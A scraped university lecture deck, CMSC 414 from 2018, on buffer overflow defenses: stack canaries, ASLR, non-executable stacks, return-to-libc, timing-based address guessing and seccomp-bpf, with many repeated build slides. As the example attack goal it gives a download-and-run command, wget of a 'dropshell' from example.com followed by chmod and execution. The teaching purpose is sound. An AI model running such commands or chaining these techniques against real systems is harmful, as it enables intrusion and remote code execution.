![Page 1: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/1.jpg)
BUFFER OVERFLOWDEFENSES &
COUNTERMEASURES
CMSC 414FEB 01 2018
![Page 2: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/2.jpg)
RECALL OUR CHALLENGES
• Putting code into the memory (no zeroes)
• Finding the return address (guess the raw address)
• Getting %eip to point to our code (dist buff to stored eip)
How can we make these even more difficult?
![Page 3: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/3.jpg)
DETECTING OVERFLOWS WITH CANARIES
00 00 00 00
buffer
text
%eip
... &arg1%eip%ebp …
![Page 4: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/4.jpg)
DETECTING OVERFLOWS WITH CANARIES
00 00 00 00
buffer
text
%eip
... &arg1%eip%ebp …
![Page 5: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/5.jpg)
DETECTING OVERFLOWS WITH CANARIES
00 00 00 00
buffer
text
%eip
... &arg1%eip%ebp …02 8d e2 10
canary
![Page 6: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/6.jpg)
DETECTING OVERFLOWS WITH CANARIES
00 00 00 00
buffer
text
%eip
... &arg1%eip%ebp …02 8d e2 10
canary
nop nop nop …0xbdf \x0f \x3c \x2f ...
![Page 7: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/7.jpg)
DETECTING OVERFLOWS WITH CANARIES
00 00 00 00
buffer
text
%eip
... &arg1%eip%ebp …02 8d e2 10
canary
nop nop nop …0xbdf \x0f \x3c \x2f ...
![Page 8: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/8.jpg)
DETECTING OVERFLOWS WITH CANARIES
00 00 00 00
buffer
text
%eip
... &arg1%eip%ebp …02 8d e2 10
canary
nop nop nop …0xbdf \x0f \x3c \x2f ...
Not the expected value: abort
![Page 9: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/9.jpg)
DETECTING OVERFLOWS WITH CANARIES
00 00 00 00
buffer
text
%eip
... &arg1%eip%ebp …02 8d e2 10
canary
nop nop nop …0xbdf \x0f \x3c \x2f ...
Not the expected value: abort
What value should the canary have?
![Page 10: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/10.jpg)
CANARY VALUES
1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these
2. Random canaries • Write a new random value @ each process start • Save the real value somewhere in memory • Must write-protect the stored value
3. Random XOR canaries • Same as random canaries • But store canary XOR some control info, instead
From StackGuard [Wagle & Cowan]
![Page 11: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/11.jpg)
RECALL OUR CHALLENGES
• Putting code into the memory (no zeroes)
• Finding the return address (guess the raw address)
• Getting %eip to point to our code (dist buff to stored eip)
How can we make these even more difficult?
Option: Make this detectable with canaries
![Page 12: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/12.jpg)
ADDRESS SPACE LAYOUT RANDOMIZATION
Text
0
4G 0xffffffff
0x00000000
cmdline & env
Uninit’d data static int x;
Init’d data static const int y=10;
Runtime
Known at compile time
Set whenprocess starts
Heap malloc(sizeof(long));
Stackint f() { int x;
…
Randomize where exactly these regions start
![Page 13: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/13.jpg)
ADDRESS SPACE LAYOUT RANDOMIZATION
• Introduces return-to-libc atk
• Probes for location of usleep
• On 32-bit architectures, only 16 bits of entropy
• fork() keeps same offsets
Shortcomings of ASLR
![Page 14: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/14.jpg)
RECALL OUR CHALLENGES
• Putting code into the memory (no zeroes)
• Finding the return address (guess the raw address)
• Getting %eip to point to our code (dist buff to stored eip)
How can we make these even more difficult?
Option: Make this detectable with canaries
Address Space Layout Randomization (ASLR)
![Page 15: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/15.jpg)
GETTING %EIP TO POINT TO OUR CODERecall that all memory has Read, Write, and Execute permissions
Text
0
4G 0xffffffff
0x00000000
cmdline & env
Uninit’d data
Init’d data
Must be readable &writeable
Must be executable
Heap
Stack But does it need to beexecutable?
Basic idea:make the stacknon-executable
![Page 16: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/16.jpg)
RETURN TO LIBCExploit:
![Page 17: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/17.jpg)
RETURN TO LIBCExploit:
Preferred: strlcpy
char buf[4]; strncpy(buf, “hello!”, sizeof(buf)); strlcpy(buf, “hello!”, sizeof(buf));
buf = {‘h’, ‘e’, ‘l’, ‘l’}buf = {‘h’, ‘e’, ‘l’, ‘\0’}
![Page 18: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/18.jpg)
RETURN TO LIBCExploit:
Goal: system(“wget http://www.example.com/dropshell ; chmod +x dropshell ; ./dropshell”);
Challenge: Non-executable stack
Insight: “system” already exists somewhere in libc
![Page 19: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/19.jpg)
RETURN TO LIBC
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
stack frame
![Page 20: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/20.jpg)
RETURN TO LIBC
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
padding
0xbdf 0xbdf 0xbdf ...
stack frame
![Page 21: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/21.jpg)
RETURN TO LIBC
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
goodguesspadding
0xbdf 0xbdf 0xbdf ...
stack frame
![Page 22: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/22.jpg)
RETURN TO LIBC
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
goodguesspadding
0xbdf 0xbdf 0xbdf ... nop nop nop …
nop sled
stack frame
![Page 23: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/23.jpg)
RETURN TO LIBC
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
goodguesspadding
0xbdf 0xbdf 0xbdf ... nop nop nop …
nop sled
\x0f \x3c \x2f ...
malicious code
stack frame
![Page 24: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/24.jpg)
RETURN TO LIBC
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
goodguesspadding
0xbdf 0xbdf 0xbdf ... nop nop nop …
nop sled
\x0f \x3c \x2f ...
malicious code
stack frame
![Page 25: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/25.jpg)
RETURN TO LIBC
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
goodguesspadding
0xbdf 0xbdf 0xbdf ... nop nop nop …
nop sled
\x0f \x3c \x2f ...
malicious code
stack frame
PANIC: address not executable
![Page 26: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/26.jpg)
RETURN TO LIBC
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
usleep()... ...printf() ... system()
libc
![Page 27: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/27.jpg)
RETURN TO LIBC
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
usleep()... ...printf() ... system()
libc
padding
![Page 28: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/28.jpg)
RETURN TO LIBC
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
usleep()... ...printf() ... system()
libc
padding
![Page 29: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/29.jpg)
RETURN TO LIBC
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
usleep()... ...printf() ... system()
libc
padding arguments
wget example.com/...
![Page 30: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/30.jpg)
RETURN TO LIBC
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
usleep()... ...printf() ... system()
libc
padding arguments
wget example.com/...
How do we guess this address?
![Page 31: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/31.jpg)
RETURN TO LIBC
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
usleep()... ...printf() ... system()
libc
padding arguments
wget example.com/...
How do we guess this address?
How do we ensure these are the args?
![Page 32: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/32.jpg)
ARGUMENTS WHEN WE ARE SMASHING %EBP?
&arg1%eip%ebp00 00 00 00
buffer
text ... …
usleep()... ...printf() ... system()
libc
%esp
padding
%ebp
arguments
wget example.com/...
%eip mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
![Page 33: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/33.jpg)
ARGUMENTS WHEN WE ARE SMASHING %EBP?
&arg1%eip%ebp00 00 00 00
buffer
text ... …
usleep()... ...printf() ... system()
libc
%esp
padding
%ebp
arguments
wget example.com/...
%eip mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
![Page 34: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/34.jpg)
ARGUMENTS WHEN WE ARE SMASHING %EBP?
&arg1%eip%ebp00 00 00 00
buffer
text ... …
usleep()... ...printf() ... system()
libc
%esp
padding
%ebp
DEADBEEF
arguments
wget example.com/...
%eip mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
![Page 35: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/35.jpg)
ARGUMENTS WHEN WE ARE SMASHING %EBP?
&arg1%eip%ebp00 00 00 00
buffer
text ... …
usleep()... ...printf() ... system()
libc
%esp
padding
%ebp
DEADBEEF
arguments
wget example.com/...
%eip mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
![Page 36: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/36.jpg)
ARGUMENTS WHEN WE ARE SMASHING %EBP?
&arg1%eip%ebp00 00 00 00
buffer
text ... …
usleep()... ...printf() ... system()
libc
%esp
padding
%ebp
DEADBEEF
arguments
wget example.com/...
%eip mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
![Page 37: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/37.jpg)
ARGUMENTS WHEN WE ARE SMASHING %EBP?
&arg1%eip%ebp00 00 00 00
buffer
text ... …
usleep()... ...printf() ... system()
libc
%esp
padding
%ebp
DEADBEEF
arguments
wget example.com/...
At this point, we can’t reliably access local variables
%eip mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
![Page 38: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/38.jpg)
ARGUMENTS WHEN WE ARE SMASHING %EBP?
&arg1%eip%ebp00 00 00 00
buffer
text ... …
usleep()... ...printf() ... system()
libc
%esp
padding
%ebp
DEADBEEF
arguments
wget example.com/...
At this point, we can’t reliably access local variables
%eip mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
![Page 39: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/39.jpg)
ARGUMENTS WHEN WE ARE SMASHING %EBP?
&arg1%eip%ebp00 00 00 00
buffer
text ... …
usleep()... ...printf() ... system()
libc
padding
mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%ebp
DEADBEEF
arguments
wget example.com/...
pushl %ebp
movl %esp, %ebp
system:%eip
%esp
![Page 40: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/40.jpg)
ARGUMENTS WHEN WE ARE SMASHING %EBP?
&arg1%eip%ebp00 00 00 00
buffer
text ... …
usleep()... ...printf() ... system()
libc
%esp
padding
%ebp
DEADBEEF
arguments
wget example.com/...
pushl %ebp
movl %esp, %ebp
system:%eip
mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
DEADBEEF
![Page 41: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/41.jpg)
ARGUMENTS WHEN WE ARE SMASHING %EBP?
&arg1%eip%ebp00 00 00 00
buffer
text ... …
usleep()... ...printf() ... system()
libc
%esp
padding
%ebp
DEADBEEF
arguments
wget example.com/...
pushl %ebp
movl %esp, %ebp
system:%eip
DEADBEEF
![Page 42: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/42.jpg)
ARGUMENTS WHEN WE ARE SMASHING %EBP?
&arg1%eip%ebp00 00 00 00
buffer
text ... …
usleep()... ...printf() ... system()
libc
%esp
padding
%ebp
DEADBEEF
arguments
wget example.com/...
pushl %ebp
movl %esp, %ebp
system:%eip
Will expect args at 8(%ebp)
DEADBEEF
![Page 43: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/43.jpg)
ARGUMENTS WHEN WE ARE SMASHING %EBP?
&arg1%eip%ebp00 00 00 00
buffer
text ... …
usleep()... ...printf() ... system()
libc
%esp
padding
%ebp
DEADBEEF
arguments
wget example.com/...
pushl %ebp
movl %esp, %ebp
system:%eip
paddingDEADBEEF
![Page 44: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/44.jpg)
ARGUMENTS WHEN WE ARE SMASHING %EBP?
&arg1%eip%ebp00 00 00 00
buffer
text ... …
usleep()... ...printf() ... system()
libc
%esp
padding
%ebp
DEADBEEF
arguments
wget example.com/...
pushl %ebp
movl %esp, %ebp
system:%eip
At this point, we can reliably access local variables
paddingDEADBEEF
![Page 45: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/45.jpg)
RETURN TO LIBC
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
usleep()... ...printf() ... system()
libc
padding arguments
wget example.com/...
How do we guess this address?
How do we ensure these are the args?
![Page 46: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/46.jpg)
RETURN TO LIBC
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
usleep()... ...printf() ... system()
libc
padding arguments
wget example.com/...
How do we guess this address?
How do we ensure these are the args?
padding
By prepending 4 byte padding
![Page 47: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/47.jpg)
INFERRING ADDRESSES WITH ASLR
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
usleep()... ...printf() ... system()
libc
padding
AAAAAAAAAAAAAAAA DEADBEEF
arguments
0x01010101
known delta (by version of libc)
DEADBEEF
![Page 48: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/48.jpg)
INFERRING ADDRESSES WITH ASLR
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
usleep()... ...printf() ... system()
libc
padding
AAAAAAAAAAAAAAAA DEADBEEF
arguments
0x01010101
known delta (by version of libc)
Repeatedly guess the address of usleep
DEADBEEF
![Page 49: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/49.jpg)
INFERRING ADDRESSES WITH ASLR
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
usleep()... ...printf() ... system()
libc
padding
AAAAAAAAAAAAAAAA DEADBEEF
arguments
0x01010101
known delta (by version of libc)
Repeatedly guess the address of usleep
0x01010101 = smallest number w/o 0-byte ≈ 16 million == 16 sec of sleep
Wrong guess of usleep = crash; retry Correct guess of usleep = response in 16 sec
DEADBEEF
![Page 50: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/50.jpg)
INFERRING ADDRESSES WITH ASLR
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
usleep()... ...printf() ... system()
libc
padding
AAAAAAAAAAAAAAAA DEADBEEF
arguments
0x01010101
known delta (by version of libc)
Repeatedly guess the address of usleep
0x01010101 = smallest number w/o 0-byte ≈ 16 million == 16 sec of sleep
Wrong guess of usleep = crash; retry Correct guess of usleep = response in 16 sec
DEADBEEF
Why this works Every connection causes a fork;
fork() does not re-randomize ASLR
![Page 51: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/51.jpg)
RETURN TO LIBC
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
usleep()... ...printf() ... system()
libc
padding arguments
wget example.com/...
How do we guess this address?
How do we ensure these are the args?
padding
By prepending 4 byte padding
By first guessing usleep
![Page 52: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/52.jpg)
DEFENSE: JUST GET RID OF SYSTEM()?
&arg1%eip%ebp00 00 00 00
buffer
text
%eip
... …
usleep()... ...printf() ... system()
libc
padding arguments
wget example.com/...padding
!
Idea: Remove any function call that (a) is not needed and (b) could wreak havoc
system() exec()
connect()open()...
![Page 53: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/53.jpg)
RELATED IDEA: SECCOMP-BPF
![Page 54: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/54.jpg)
RELATED IDEA: SECCOMP-BPF• Linux system call enabled since 2.6.12 (2005)
• Affected process can subsequently only perform read, write, exit, and sigreturn system calls
- No support for open call: Can only use already-open file descriptors
• Isolates a process by limiting possible interactions
![Page 55: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/55.jpg)
RELATED IDEA: SECCOMP-BPF• Linux system call enabled since 2.6.12 (2005)
• Affected process can subsequently only perform read, write, exit, and sigreturn system calls
- No support for open call: Can only use already-open file descriptors
• Isolates a process by limiting possible interactions
• Follow-on work produced seccomp-bpf• Limit process to policy-specific set of system calls,
subject to a policy handled by the kernel- Policy akin to Berkeley Packet Filters (BPF)
• Used by Chrome, OpenSSH, vsftpd, and others
![Page 56: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/56.jpg)
RETURN-ORIENTED PROGRAMMING
• Introduces return-oriented programming
• Shows that a nontrivial amount of code will have enough code to permit virtually any ROP attack
Shortcomings of removingfunctions from libc
![Page 57: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/57.jpg)
